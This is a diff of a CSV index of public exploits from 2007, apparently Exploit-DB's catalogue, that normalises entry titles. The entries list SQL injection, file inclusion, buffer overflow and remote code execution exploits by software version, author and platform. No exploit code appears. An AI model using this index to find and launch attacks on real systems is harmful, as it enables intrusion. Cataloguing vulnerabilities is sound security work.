Exploit",2007-03-21,MADYNES,hardware,dos,0 3536,platforms/asp/webapps/3536.txt,"Active Photo Gallery (default.asp catid) SQL Injection Vulnerability",2007-03-21,CyberGhost,asp,webapps,0 3537,platforms/windows/remote/3537.py,"Mercur Messaging 2005 IMAP (SUBSCRIBE) Remote Exploit (win2k SP4)",2007-03-21,"Winny Thomas",windows,remote,143 -3538,platforms/php/webapps/3538.txt,"php-revista <= 1.1.2 Multiple Remote SQL Injection Vulnerabilities",2007-03-21,"Cold Zero",php,webapps,0 +3538,platforms/php/webapps/3538.txt,"php-revista <= 1.1.2 Multiple Remote SQL Injection Vulnerabilities",2007-03-21,"Cold Zero",php,webapps,0 3539,platforms/php/webapps/3539.txt,"Mambo Component nfnaddressbook 0.4 Remote File Inclusion Vulnerability",2007-03-21,"Cold Zero",php,webapps,0 -3540,platforms/windows/remote/3540.py,"Mercur Messaging 2005 <= SP4 IMAP Remote Exploit (egghunter mod)",2007-03-21,muts,windows,remote,143 +3540,platforms/windows/remote/3540.py,"Mercur Messaging 2005 <= SP4 - IMAP Remote Exploit (egghunter mod)",2007-03-21,muts,windows,remote,143 3541,platforms/windows/remote/3541.pl,"FutureSoft TFTP Server 2000 Remote SEH Overwrite Exploit",2007-03-22,"Umesh Wanve",windows,remote,69 3542,platforms/php/webapps/3542.txt,"ClassWeb 2.0.3 (BASE) Remote File Inclusion Vulnerabilities",2007-03-22,GoLd_M,php,webapps,0 3543,platforms/php/webapps/3543.pl,"PortailPhp 2.0 (idnews) Remote SQL Injection Exploit",2007-03-22,"Mehmet Ince",php,webapps,0 3544,platforms/windows/remote/3544.c,"Microsoft DNS Server (Dynamic DNS Updates) Remote Exploit",2007-03-22,"Andres Tarasco",windows,remote,0 3545,platforms/php/webapps/3545.txt,"LMS <= 1.8.9 Vala Remote File Inclusion Vulnerabilities",2007-03-22,Kacper,php,webapps,0 3546,platforms/asp/webapps/3546.txt,"aspWebCalendar 4.5 (calendar.asp eventid) SQL Injection Vulnerability",2007-03-22,parad0x,asp,webapps,0 -3547,platforms/windows/dos/3547.c,"0irc-client v1345 build20060823 Denial of Service Exploit",2007-03-22,DiGitalX,windows,dos,0 +3547,platforms/windows/dos/3547.c,"0irc-client 1345 build20060823 - Denial of Service Exploit",2007-03-22,DiGitalX,windows,dos,0 3548,platforms/php/webapps/3548.pl,"RoseOnlineCMS 3 beta2 (op) Local File Inclusion Exploit",2007-03-23,GoLd_M,php,webapps,0 3549,platforms/asp/webapps/3549.txt,"Active Trade v 2 (default.asp catid) Remote SQL Injection Vulnerability",2007-03-23,CyberGhost,asp,webapps,0 3550,platforms/asp/webapps/3550.txt,"ActiveBuyandSell 6.2 (buyersend.asp catid) SQL Injection Vulnerability",2007-03-23,CyberGhost,asp,webapps,0 @@ -3222,7 +3222,7 @@ id,file,description,date,author,platform,type,port 3560,platforms/php/webapps/3560.txt,"Joomla Component Joomlaboard 1.1.1 (sbp) RFI Vulnerability",2007-03-23,"Cold Zero",php,webapps,0 3561,platforms/windows/remote/3561.pl,"Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit",2007-03-24,"Jacopo Cervini",windows,remote,143 3562,platforms/php/webapps/3562.txt,"Net-Side.net CMS (index.php cms) Remote File Inclusion Vulnerability",2007-03-24,Sharingan,php,webapps,0 -3563,platforms/php/webapps/3563.txt,"ttCMS <= v4 (ez_sql.php lib_path) Remote File Inclusion Vulnerability",2007-03-24,Kacper,php,webapps,0 +3563,platforms/php/webapps/3563.txt,"ttCMS <= 4 - (ez_sql.php lib_path) Remote File Inclusion Vulnerability",2007-03-24,Kacper,php,webapps,0 3564,platforms/php/webapps/3564.pl,"Joomla Component Car Manager <= 1.1 Remote SQL Injection Exploit",2007-03-24,ajann,php,webapps,0 3565,platforms/php/webapps/3565.pl,"Joomla Component RWCards <= 2.4.3 Remote SQL Injection Exploit",2007-03-24,ajann,php,webapps,0 3566,platforms/multiple/dos/3566.pl,"Asterisk <= 1.2.16 / 1.4.1 SIP INVITE Remote Denial of Service Exploit",2007-03-25,MADYNES,multiple,dos,0 @@ -3242,7 +3242,7 @@ id,file,description,date,author,platform,type,port 3581,platforms/php/webapps/3581.pl,"IceBB 1.0-rc5 Remote Code Execution Exploit",2007-03-26,Hessam-x,php,webapps,0 3582,platforms/php/webapps/3582.pl,"PHP-Nuke Module Addressbook 1.2 Local File Inclusion Exploit",2007-03-26,bd0rk,php,webapps,0 3583,platforms/php/webapps/3583.txt,"C-Arbre <= 0.6PR7 (root_path) Remote File Inclusion Vulnerability",2007-03-26,K-159,php,webapps,0 -3584,platforms/multiple/remote/3584.pl,"Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit v2",2007-03-27,bunker,multiple,remote,0 +3584,platforms/multiple/remote/3584.pl,"Oracle 10g KUPM$MCP.MAIN - SQL Injection Exploit (2)",2007-03-27,bunker,multiple,remote,0 3585,platforms/multiple/remote/3585.pl,"Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit",2007-03-27,bunker,multiple,remote,0 3586,platforms/linux/dos/3586.php,"PHP 4.4.5 / 4.4.6 session_decode() Double Free Exploit PoC",2007-03-27,"Stefan Esser",linux,dos,0 3587,platforms/linux/local/3587.c,"Linux Kernel <= 2.6.20 with DCCP Support Memory Disclosure Exploit",2007-03-27,"Robert Swiecki",linux,local,0 @@ -3253,7 +3253,7 @@ id,file,description,date,author,platform,type,port 3592,platforms/php/webapps/3592.htm,"Web Content System 2.7.1 Remote File Inclusion Exploit",2007-03-27,kezzap66345,php,webapps,0 3593,platforms/windows/local/3593.c,"Corel Wordperfect X3 13.0.0.565 (.PRS) Local Buffer Overflow Exploit",2007-03-28,"Jonathan So",windows,local,0 3594,platforms/php/webapps/3594.pl,"XOOPS module Articles <= 1.03 (index.php cat_id) SQL Injection Exploit",2007-03-28,ajann,php,webapps,0 -3595,platforms/linux/local/3595.c,"Linux Kernel <= 2.6.20 with DCCP Support Memory Disclosure Exploit v2",2007-03-28,"Robert Swiecki",linux,local,0 +3595,platforms/linux/local/3595.c,"Linux Kernel <= 2.6.20 with DCCP Support Memory Disclosure Exploit (2)",2007-03-28,"Robert Swiecki",linux,local,0 3596,platforms/php/webapps/3596.txt,"iPhotoAlbum 1.1 (header.php) Remote File Include Vulnerability",2007-03-28,GoLd_M,php,webapps,0 3597,platforms/php/webapps/3597.pl,"XOOPS Module Friendfinder <= 3.3 (view.php id) SQL Injection Exploit",2007-03-28,ajann,php,webapps,0 3598,platforms/php/webapps/3598.txt,"MangoBery CMS 0.5.5 (quotes.php) Remote File Inclusion Vulnerability",2007-03-28,kezzap66345,php,webapps,0 @@ -3305,7 +3305,7 @@ id,file,description,date,author,platform,type,port 3647,platforms/windows/local/3647.c,"MS Windows Animated Cursor (.ANI) Local Buffer Overflow Exploit",2007-04-02,Marsu,windows,local,0 3648,platforms/windows/local/3648.c,"IrfanView 3.99 (.ANI File) Local Buffer Overflow Exploit",2007-04-02,Marsu,windows,local,0 3649,platforms/windows/local/3649.c,"Ipswitch WS_FTP 5.05 Server Manager Local Site Buffer Overflow Exploit",2007-04-02,Marsu,windows,local,0 -3650,platforms/windows/remote/3650.c,"Frontbase <= 4.2.7 POST-AUTH Remote Buffer Overflow Exploit v2.2",2007-04-02,Heretic2,windows,remote,0 +3650,platforms/windows/remote/3650.c,"Frontbase <= 4.2.7 - POST-AUTH Remote Buffer Overflow Exploit (2.2)",2007-04-02,Heretic2,windows,remote,0 3651,platforms/windows/remote/3651.txt,"MS Windows Animated Cursor (.ANI) Universal Exploit Generator",2007-04-03,"YAG KOHHA",windows,remote,0 3652,platforms/windows/local/3652.c,"MS Windows Animated Cursor (.ANI) Overflow Exploit (Hardware DEP)",2007-04-03,devcode,windows,local,0 3653,platforms/php/webapps/3653.php,"MyBulletinBoard (MyBB) <= 1.2.3 Remote Code Execution Exploit",2007-04-03,DarkFig,php,webapps,0 @@ -3360,7 +3360,7 @@ id,file,description,date,author,platform,type,port 3703,platforms/php/webapps/3703.txt,"Joomla/Mambo Component Taskhopper 1.1 RFI Vulnerabilities",2007-04-10,"Cold Zero",php,webapps,0 3704,platforms/php/webapps/3704.txt,"pL-PHP beta 0.9 Multiple Remote Vulnerabilities",2007-04-10,Omni,php,webapps,0 3705,platforms/php/webapps/3705.txt,"SimpCMS <= 04.10.2007 (site) Remote File Inclusion Vulnerability",2007-04-10,Dr.RoVeR,php,webapps,0 -3706,platforms/php/webapps/3706.txt,"Mambo Component zOOm Media Gallery <= 2.5 Beta 2 RFI Vulnerabilities",2007-04-11,iskorpitx,php,webapps,0 +3706,platforms/php/webapps/3706.txt,"Mambo Component zOOm Media Gallery <= 2.5 Beta 2 RFI Vulnerabilities",2007-04-11,iskorpitx,php,webapps,0 3707,platforms/php/webapps/3707.txt,"TOSMO/Mambo 1.4.13a (absolute_path) Remote File Inclusion Vulns",2007-04-11,"Cold Zero",php,webapps,0 3708,platforms/multiple/remote/3708.htm,"MiniWebsvr 0.0.7 Remote Directory Transversal Exploit",2007-04-11,shinnai,multiple,remote,0 3709,platforms/multiple/dos/3709.html,"Gran Paradiso 3.0a3 non-existent applet Denial of Service Exploit",2007-04-11,shinnai,multiple,dos,0 @@ -3377,7 +3377,7 @@ id,file,description,date,author,platform,type,port 3721,platforms/php/webapps/3721.pl,"e107 0.7.8 (mailout.php) Access Escalation Exploit (admin needed)",2007-04-12,Gammarays,php,webapps,0 3722,platforms/php/webapps/3722.txt,"Expow 0.8 (autoindex.php cfg_file) Remote File Inclusion Vulnerability",2007-04-12,mdx,php,webapps,0 3723,platforms/php/webapps/3723.txt,"Request It 1.0b (index.php id) Remote File Inclusion Vulnerability",2007-04-12,hackberry,php,webapps,0 -3724,platforms/linux/remote/3724.c,"Aircrack-ng 0.7 (specially crafted 802.11 packets) Remote BoF Exploit",2007-04-12,"Jonathan So",linux,remote,0 +3724,platforms/linux/remote/3724.c,"Aircrack-ng 0.7 - (Specially Crafted 802.11 Packets) Remote BoF Exploit",2007-04-12,"Jonathan So",linux,remote,0 3725,platforms/php/webapps/3725.php,"Chatness <= 2.5.3 (options.php/save.php) Remote Code Execution Exploit",2007-04-12,Gammarays,php,webapps,0 3726,platforms/multiple/dos/3726.c,"Ettercap-NG 0.7.3 Remote Denial of Service Exploit",2007-04-13,evilrabbi,multiple,dos,0 3727,platforms/windows/local/3727.c,"VCDGear <= 3.56 Build 050213 (FILE) Local Code Execution Exploit",2007-04-13,InTeL,windows,local,0 @@ -3388,7 +3388,7 @@ id,file,description,date,author,platform,type,port 3732,platforms/php/webapps/3732.txt,"Garennes 0.6.1 (repertoire_config) Remote File Inclusion Vulnerabilities",2007-04-13,GoLd_M,php,webapps,0 3733,platforms/php/webapps/3733.txt,"Pixaria Gallery 1.x (class.Smarty.php) Remote File Include Vulnerability",2007-04-14,irvian,php,webapps,0 3734,platforms/php/webapps/3734.txt,"Joomla Module AutoStand 1.0 Remote File Inclusion Vulnerability",2007-04-14,"Cold Zero",php,webapps,0 -3735,platforms/php/webapps/3735.txt,"LS simple guestbook (v1) Remote Code Execution Vulnerability",2007-04-14,Gammarays,php,webapps,0 +3735,platforms/php/webapps/3735.txt,"LS Simple Guestbook 1.0 - Remote Code Execution Vulnerability",2007-04-14,Gammarays,php,webapps,0 3736,platforms/php/webapps/3736.txt,"Mambo/Joomla Component Article 1.1 Remote File Inclusion Vulnerability",2007-04-14,"Cold Zero",php,webapps,0 3737,platforms/windows/remote/3737.py,"MS Windows DNS RPC Remote Buffer Overflow Exploit (win2k SP4)",2007-04-15,"Winny Thomas",windows,remote,139 3738,platforms/windows/remote/3738.php,"XAMPP for Windows <= 1.6.0a mssql_connect() Remote BoF Exploit",2007-04-15,rgod,windows,remote,80 @@ -3399,7 +3399,7 @@ id,file,description,date,author,platform,type,port 3743,platforms/php/webapps/3743.txt,"Gallery 1.2.5 (GALLERY_BASEDIR) Multiple RFI Vulnerabilities",2007-04-15,GoLd_M,php,webapps,0 3744,platforms/php/webapps/3744.txt,"audioCMS arash 0.1.4 (arashlib_dir) Remote File Inclusion Vulnerabilities",2007-04-15,GoLd_M,php,webapps,0 3745,platforms/php/webapps/3745.txt,"Web Slider 0.6 (path) Remote File Inclusion Vulnerabilities",2007-04-15,GoLd_M,php,webapps,0 -3746,platforms/windows/remote/3746.txt,"MS Windows DNS RPC Remote Buffer Overflow Exploit (port 445) v2",2007-04-18,"Andres Tarasco",windows,remote,445 +3746,platforms/windows/remote/3746.txt,"Microsoft Windows DNS RPC - Remote Buffer Overflow Exploit (port 445) (2)",2007-04-18,"Andres Tarasco",windows,remote,445 3747,platforms/php/webapps/3747.txt,"openMairie 1.10 (scr/soustab.php) Local File Inclusion Vulnerability",2007-04-16,GoLd_M,php,webapps,0 3748,platforms/php/webapps/3748.txt,"SunShop Shopping Cart <= 3.5 (abs_path) RFI Vulnerabilities",2007-04-16,irvian,php,webapps,0 3749,platforms/php/webapps/3749.txt,"StoreFront for Gallery (GALLERY_BASEDIR) RFI Vulnerabilities",2007-04-16,"Alkomandoz Hacker",php,webapps,0 @@ -3425,7 +3425,7 @@ id,file,description,date,author,platform,type,port 3769,platforms/linux/dos/3769.c,"eXtremail <= 2.1.1 DNS Parsing Bugs Remote Exploit PoC",2007-04-20,mu-b,linux,dos,0 3770,platforms/windows/dos/3770.pl,"Foxit Reader 2.0 (PDF) Remote Denial of Service Exploit",2007-04-20,n00b,windows,dos,0 3771,platforms/php/webapps/3771.txt,"Supasite 1.23b Multiple Remote File Inclusion Vulnerabilities",2007-04-21,GoLd_M,php,webapps,0 -3772,platforms/windows/local/3772.c,"Photofiltre Studio v8.1.1 (.TIF File) Local Buffer Overflow Exploit",2007-04-21,Marsu,windows,local,0 +3772,platforms/windows/local/3772.c,"Photofiltre Studio 8.1.1 - (.TIF File) Local Buffer Overflow Exploit",2007-04-21,Marsu,windows,local,0 3773,platforms/php/webapps/3773.txt,"JChit counter 1.0.0 (imgsrv.php ac) Remote File Disclosure Vulnerability",2007-04-22,Dj7xpl,php,webapps,0 3774,platforms/php/webapps/3774.txt,"PHP-Ring Webring System 0.9 Remote SQL Injection Vulnerability",2007-04-22,Dj7xpl,php,webapps,0 3775,platforms/php/webapps/3775.txt,"Maran PHP Forum (forum_write.php) Remote Code Execution Vulnerability",2007-04-22,Dj7xpl,php,webapps,0 @@ -3488,7 +3488,7 @@ id,file,description,date,author,platform,type,port 3832,platforms/php/webapps/3832.txt,"1024 CMS 0.7 (download.php item) Remote File Disclosure Vulnerability",2007-05-02,Dj7xpl,php,webapps,0 3833,platforms/php/webapps/3833.pl,"mxBB Module FAQ & RULES 2.0.0 Remote File Inclusion Exploit",2007-05-02,bd0rk,php,webapps,0 3834,platforms/php/webapps/3834.php,"YaPIG 0.95b Remote Code Execution Exploit",2007-05-02,Dj7xpl,php,webapps,0 -3835,platforms/php/webapps/3835.txt,"PostNuke Module v4bJournal Remote SQL Injection Vulnerability",2007-05-02,"Ali Abbasi",php,webapps,0 +3835,platforms/php/webapps/3835.txt,"PostNuke Module v4bJournal - Remote SQL Injection Vulnerability",2007-05-02,"Ali Abbasi",php,webapps,0 3836,platforms/windows/dos/3836.html,"Word Viewer OCX 3.2 Remote Denial of Service Exploit",2007-05-03,shinnai,windows,dos,0 3837,platforms/php/webapps/3837.txt,"phpChess Community Edition 2.0 Multiple RFI Vulnerabilities",2007-05-03,GoLd_M,php,webapps,0 3838,platforms/php/webapps/3838.txt,"Open Translation Engine (OTE) 0.7.8 (header.php ote_home) RFI Vuln",2007-05-03,GoLd_M,php,webapps,0 @@ -3579,7 +3579,7 @@ id,file,description,date,author,platform,type,port 3925,platforms/windows/remote/3925.py,"TinyIdentD <= 2.2 Remote Buffer Overflow Exploit",2007-05-14,"Thomas Pollet",windows,remote,113 3926,platforms/windows/dos/3926.py,"MS Windows Vista forged ARP packet Network Stack DoS Exploit",2007-05-15,"Kristian Hermansen",windows,dos,0 3927,platforms/windows/remote/3927.html,"DeWizardX (DEWizardAX.ocx) Arbitrary File Overwrite Exploit",2007-05-15,shinnai,windows,remote,0 -3928,platforms/php/webapps/3928.txt,"Achievo 1.1.0 (atk.inc config_atkroot) Remote File Inclusion Vulnerability",2007-05-15,Katatafish,php,webapps,0 +3928,platforms/php/webapps/3928.txt,"Achievo 1.1.0 (atk.inc config_atkroot) Remote File Inclusion Vulnerability",2007-05-15,Katatafish,php,webapps,0 3929,platforms/windows/dos/3929.txt,"BitsCast 0.13.0 (invalid string) Remote Denial of Service Exploit",2007-05-15,gbr,windows,dos,0 3930,platforms/windows/dos/3930.txt,"NewzCrawler 1.8 (invalid string) Remote Denial of Service Exploit",2007-05-15,gbr,windows,dos,0 3931,platforms/php/webapps/3931.htm,"XOOPS Module resmanager <= 1.21 BLIND SQL Injection Exploit",2007-05-15,ajann,php,webapps,0 @@ -3594,7 +3594,7 @@ id,file,description,date,author,platform,type,port 3940,platforms/windows/dos/3940.py,"CA BrightStor Backup 11.5.2.0 Mediasvr.exe Denial of Service Exploit",2007-05-16,Shirkdog,windows,dos,0 3941,platforms/php/webapps/3941.txt,"PHPGlossar 0.8 (format_menue) Remote File Inclusion Vulnerabilities",2007-05-16,kezzap66345,php,webapps,0 3942,platforms/php/webapps/3942.pl,"SimpNews <= 2.40.01 (print.php newnr) Remote SQL Injection Exploit",2007-05-16,Silentz,php,webapps,0 -3943,platforms/php/webapps/3943.pl,"FAQEngine <= 4.16.03 (question.php questionref) SQL Injection Exploit",2007-05-16,Silentz,php,webapps,0 +3943,platforms/php/webapps/3943.pl,"FAQEngine <= 4.16.03 (question.php questionref) SQL Injection Exploit",2007-05-16,Silentz,php,webapps,0 3944,platforms/php/webapps/3944.txt,"Mambo com_yanc 1.4 beta (id) Remote SQL Injection Vulnerability",2007-05-17,"Mehmet Ince",php,webapps,0 3945,platforms/linux/dos/3945.rb,"MagicISO <= 5.4(build239) .cue File Heap Overflow PoC",2007-05-17,n00b,linux,dos,0 3946,platforms/php/webapps/3946.txt,"GeekLog 2.x ImageImageMagick.php Remote File Inclusion Vulnerability",2007-05-17,diesl0w,php,webapps,0 @@ -3608,7 +3608,7 @@ id,file,description,date,author,platform,type,port 3954,platforms/windows/remote/3954.py,"Rational Software Hidden Administrator 1.7 Auth Bypass Exploit",2007-05-19,"Ahmed Siddiqui",windows,remote,69 3955,platforms/php/webapps/3955.py,"Zomplog <= 3.8 (mp3playlist.php speler) Remote SQL Injection Exploit",2007-05-20,NeoMorphS,php,webapps,0 3956,platforms/php/webapps/3956.php,"AlstraSoft E-Friends <= 4.21 Admin Session Retrieve Exploit",2007-05-20,BlackHawk,php,webapps,0 -3957,platforms/php/webapps/3957.php,"AlstraSoft Live Support v1.21 Admin Credential Retrieve Exploit",2007-05-20,BlackHawk,php,webapps,0 +3957,platforms/php/webapps/3957.php,"AlstraSoft Live Support 1.21 - Admin Credential Retrieve Exploit",2007-05-20,BlackHawk,php,webapps,0 3958,platforms/php/webapps/3958.php,"AlstraSoft Template Seller Pro <= 3.25 Admin Password Change Exploit",2007-05-20,BlackHawk,php,webapps,0 3959,platforms/php/webapps/3959.php,"AlstraSoft Template Seller Pro <= 3.25 Remote Code Execution Exploit",2007-05-20,BlackHawk,php,webapps,0 3960,platforms/php/webapps/3960.php,"Wordpress 2.1.3 admin-ajax.php SQL Injection Blind Fishing Exploit",2007-05-21,waraxe,php,webapps,0 @@ -3645,7 +3645,7 @@ id,file,description,date,author,platform,type,port 3991,platforms/php/webapps/3991.txt,"OpenBASE 0.6a (root_prefix) Remote File Inclusion Vulnerabilities",2007-05-25,DeltahackingTEAM,php,webapps,0 3992,platforms/php/webapps/3992.txt,"FlaP 1.0b (pachtofile) Remote File Inclusion Vulnerabilities",2007-05-25,"Mehmet Ince",php,webapps,0 3993,platforms/windows/remote/3993.html,"IE 6 / Ademco, co., ltd. ATNBaseLoader100 Module Remote BoF Exploit",2007-05-26,rgod,windows,remote,0 -3994,platforms/php/webapps/3994.txt,"Mazens PHP Chat V3 (basepath) Remote File Inclusion Vulnerabilities",2007-05-26,"ThE TiGeR",php,webapps,0 +3994,platforms/php/webapps/3994.txt,"Mazens PHP Chat V3 (basepath) - Remote File Inclusion Vulnerabilities",2007-05-26,"ThE TiGeR",php,webapps,0 3995,platforms/php/webapps/3995.txt,"TROforum 0.1 (admin.php site_url) Remote File Inclusion Vulnerability",2007-05-26,"Mehmet Ince",php,webapps,0 3996,platforms/windows/remote/3996.c,"Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)",2007-05-26,fabio/b0x,windows,remote,80 3997,platforms/php/webapps/3997.txt,"Frequency Clock 0.1b (securelib) Remote File Inclusion Vulnerabilities",2007-05-27,"ThE TiGeR",php,webapps,0 @@ -3661,7 +3661,7 @@ id,file,description,date,author,platform,type,port 4007,platforms/asp/webapps/4007.txt,"Vizayn Urun Tanitim Sistemi 0.2 (tr) Remote SQL Injection Vulnerability",2007-05-30,BAHADIR,asp,webapps,0 4008,platforms/windows/remote/4008.html,"Zenturi ProgramChecker ActiveX File Download/Overwrite Exploit",2007-05-30,shinnai,windows,remote,0 4009,platforms/windows/dos/4009.html,"EDraw Office Viewer Component Denial of Service Exploit",2007-05-30,shinnai,windows,dos,0 -4010,platforms/windows/remote/4010.html,"EDraw Office Viewer Component Unsafe Method Exploit",2007-05-30,shinnai,windows,remote,0 +4010,platforms/windows/remote/4010.html,"EDraw Office Viewer Component Unsafe Method Exploit",2007-05-30,shinnai,windows,remote,0 4011,platforms/windows/dos/4011.html,"LeadTools Raster ISIS Object (LTRIS14e.DLL v. 14.5.0.44) Remote BoF",2007-05-30,shinnai,windows,dos,0 4012,platforms/windows/dos/4012.html,"LeadTools Raster OCR Document Object Library Memory Corruption Exploit",2007-05-30,shinnai,windows,dos,0 4013,platforms/osx/local/4013.txt,"Mac OS X < 2007-005 (vpnd) Local Privilege Escalation Exploit",2007-05-30,"Kevin Finisterre",osx,local,0 @@ -3676,7 +3676,7 @@ id,file,description,date,author,platform,type,port 4023,platforms/windows/remote/4023.html,"IE6 / Provideo Camimage (ISSCamControl.dll 1.0.1.5) Remote BoF Exploit",2007-06-02,rgod,windows,remote,0 4024,platforms/windows/local/4024.rb,"DVD X Player 4.1 Professional .PLF file Buffer Overflow Exploit",2007-06-02,n00b,windows,local,0 4025,platforms/php/webapps/4025.php,"Quick.Cart <= 2.2 RFI/LFI Remote Code Execution Exploit",2007-06-02,Kacper,php,webapps,0 -4026,platforms/php/webapps/4026.php,"PNphpBB2 <= 1.2 (index.php c) Remote SQL Injection Exploit",2007-06-03,Kacper,php,webapps,0 +4026,platforms/php/webapps/4026.php,"PNphpBB2 <= 1.2 - (index.php c) Remote SQL Injection Exploit",2007-06-03,Kacper,php,webapps,0 4027,platforms/windows/remote/4027.py,"IBM Tivoli Provisioning Manager PRE AUTH Remote Exploit",2007-06-03,muts,windows,remote,8080 4028,platforms/linux/local/4028.txt,"screen 4.0.3 Local Authentication Bypass Vulnerability (OpenBSD)",2008-06-18,Rembrandt,linux,local,0 4029,platforms/php/webapps/4029.php,"Sendcard <= 3.4.1 (Local File Inclusion) Remote Code Execution Exploit",2007-06-04,Silentz,php,webapps,0 @@ -3697,8 +3697,8 @@ id,file,description,date,author,platform,type,port 4044,platforms/windows/dos/4044.txt,"MS Windows GDI+ ICO File Remote Denial of Service Exploit",2007-06-07,kad,windows,dos,0 4045,platforms/windows/remote/4045.py,"Microsoft Windows Animated Cursor Stack Overflow Exploit",2007-06-07,"RISE Security",windows,remote,0 4046,platforms/windows/dos/4046.pl,"MiniWeb Http Server 0.8.x Remote Denial of Service Exploit",2007-06-07,gbr,windows,dos,0 -4047,platforms/windows/dos/4047.c,"SafeNET High Assurance Remote 1.4.0 (IPSecDrv.sys) Remote DoS",2007-06-08,mu-b,windows,dos,0 -4049,platforms/windows/remote/4049.html,"Zenturi ProgramChecker ActiveX Multiple Insecure Methods Exploit",2007-06-08,shinnai,windows,remote,0 +4047,platforms/windows/dos/4047.c,"SafeNET High Assurance Remote 1.4.0 (IPSecDrv.sys) Remote DoS",2007-06-08,mu-b,windows,dos,0 +4049,platforms/windows/remote/4049.html,"Zenturi ProgramChecker ActiveX Multiple Insecure Methods Exploit",2007-06-08,shinnai,windows,remote,0 4050,platforms/windows/remote/4050.html,"Zenturi ProgramChecker ActiveX NavigateUrl() Insecure Method Exploit",2007-06-08,shinnai,windows,remote,0 4051,platforms/windows/local/4051.rb,"MoviePlay 4.76 .lst File Local Buffer Overflow Exploit",2007-06-08,n00b,windows,local,0 4052,platforms/windows/remote/4052.c,"Yahoo! Messenger Webcam 8.1 (Ywcvwr.dll) Download / Execute Exploit",2007-06-08,Excepti0n,windows,remote,0 @@ -3745,7 +3745,7 @@ id,file,description,date,author,platform,type,port 4096,platforms/php/webapps/4096.php,"Pluxml 0.3.1 Remote Code Execution Exploit",2007-06-24,DarkFig,php,webapps,0 4097,platforms/php/webapps/4097.txt,"DAGGER Web Engine <= 23jan2007 Remote File Inclusion Vulnerability",2007-06-24,Katatafish,php,webapps,0 4098,platforms/php/webapps/4098.php,"Simple Invoices 2007 05 25 (index.php submit) SQL Injection Exploit",2007-06-24,Kacper,php,webapps,0 -4099,platforms/php/webapps/4099.txt,"e107 <= 0.7.8 (photograph) Arbitrary File Upload Vulnerability",2007-06-24,g00ns,php,webapps,0 +4099,platforms/php/webapps/4099.txt,"e107 <= 0.7.8 - (photograph) Arbitrary File Upload Vulnerability",2007-06-24,g00ns,php,webapps,0 4100,platforms/php/webapps/4100.txt,"phpTrafficA <= 1.4.2 (pageid) Remote SQL Injection Vulnerability",2007-06-24,"laurent gaffiĂ© ",php,webapps,0 4101,platforms/windows/remote/4101.html,"NCTAudioEditor2 ActiveX DLL (NCTWMAFile2.dll v. 2.6.2.157) Exploit",2007-06-25,shinnai,windows,remote,0 4102,platforms/php/webapps/4102.txt,"b1gbb 2.24.0 (footer.inc.php tfooter) Remote File Inclusion Vulnerability",2007-06-25,Rf7awy,php,webapps,0 @@ -3765,7 +3765,7 @@ id,file,description,date,author,platform,type,port 4116,platforms/php/webapps/4116.txt,"QuickTicket 1.2 (qti_checkname.php) Local File Inclusion Vulnerability",2007-06-27,Katatafish,php,webapps,0 4118,platforms/windows/dos/4118.html,"RealNetworks RealPlayer/HelixPlayer SMIL wallclock Stack Overflow PoC",2007-06-27,axis,windows,dos,0 4119,platforms/windows/remote/4119.html,"HP Digital Imaging (hpqxml.dll 2.0.0.133) Arbitary Data Write Exploit",2007-06-27,callAX,windows,remote,0 -4120,platforms/windows/dos/4120.html,"Sony Network Camera SNC-P5 v1.0 ActiveX viewer Heap Overflow PoC",2007-06-27,str0ke,windows,dos,0 +4120,platforms/windows/dos/4120.html,"Sony Network Camera SNC-P5 1.0 - ActiveX viewer Heap Overflow PoC",2007-06-27,str0ke,windows,dos,0 4121,platforms/windows/dos/4121.txt,"Microsoft Excel 2000/2003 Sheet Name Vulnerability PoC",2007-06-27,ZhenHan.Liu,windows,dos,0 4122,platforms/php/webapps/4122.txt,"b1gbb 2.24.0 (SQL Injection / XSS) Remote Vulnerabilities",2007-06-28,GoLd_M,php,webapps,0 4123,platforms/windows/remote/4123.html,"AMX Corp. VNC ActiveX Control (AmxVnc.dll 1.0.13.0) BoF Exploit",2007-06-28,rgod,windows,remote,0 @@ -3792,7 +3792,7 @@ id,file,description,date,author,platform,type,port 4144,platforms/php/webapps/4144.php,"MyCMS <= 0.9.8 Remote Command Execution Exploit (2 method)",2007-07-03,BlackHawk,php,webapps,0 4145,platforms/php/webapps/4145.php,"MyCMS <= 0.9.8 Remote Command Execution Exploit",2007-07-03,BlackHawk,php,webapps,0 4146,platforms/windows/remote/4146.cpp,"ESRI ArcSDE 9.0 - 9.2sp1 Remote Buffer Overflow Exploit",2007-07-03,Heretic2,windows,remote,5151 -4147,platforms/php/webapps/4147.php,"PNphpBB2 <= 1.2i viewforum.php Remote SQL Injection Exploit",2007-07-03,Coloss,php,webapps,0 +4147,platforms/php/webapps/4147.php,"PNphpBB2 <= 1.2i - viewforum.php Remote SQL Injection Exploit",2007-07-03,Coloss,php,webapps,0 4148,platforms/windows/dos/4148.html,"EnjoySAP ActiveX kweditcontrol.kwedit.1 Remote Stack Overflow PoC",2007-07-05,"Mark Litchfield",windows,dos,0 4149,platforms/windows/dos/4149.html,"EnjoySAP ActiveX rfcguisink.rfcguisink.1 Remote Heap Overflow PoC",2007-07-05,"Mark Litchfield",windows,dos,0 4150,platforms/php/webapps/4150.txt,"VRNews 1.1.1 (admin.php) Remote Permission Bypass Vulnerability",2007-07-05,R4M!,php,webapps,0 @@ -3807,7 +3807,7 @@ id,file,description,date,author,platform,type,port 4159,platforms/php/webapps/4159.txt,"GameSiteScript <= 3.1 (profile id) Remote SQL Injection Vulnerability",2007-07-07,Xenduer77,php,webapps,0 4160,platforms/windows/remote/4160.html,"Chilkat Zip ActiveX Component 12.4 Multiple Insecure Methods Exploit",2007-07-07,shinnai,windows,remote,0 4161,platforms/php/webapps/4161.txt,"FlashGameScript <= 1.7 (user) Remote SQL Injection Vulnerability",2007-07-08,Xenduer77,php,webapps,0 -4162,platforms/linux/remote/4162.c,"Apache Tomcat Connector (mod_jk) Remote Exploit (exec-shield)",2007-07-08,Xpl017Elz,linux,remote,80 +4162,platforms/linux/remote/4162.c,"Apache Tomcat Connector (mod_jk) Remote Exploit (exec-shield)",2007-07-08,Xpl017Elz,linux,remote,80 4163,platforms/php/webapps/4163.php,"AV Tutorial Script 1.0 Remote User Pass Change Exploit",2007-07-08,Dj7xpl,php,webapps,0 4164,platforms/php/webapps/4164.txt,"Aigaion <= 1.3.3 (topic topic_id) Remote SQL Injection Vulnerability",2007-07-09,CypherXero,php,webapps,0 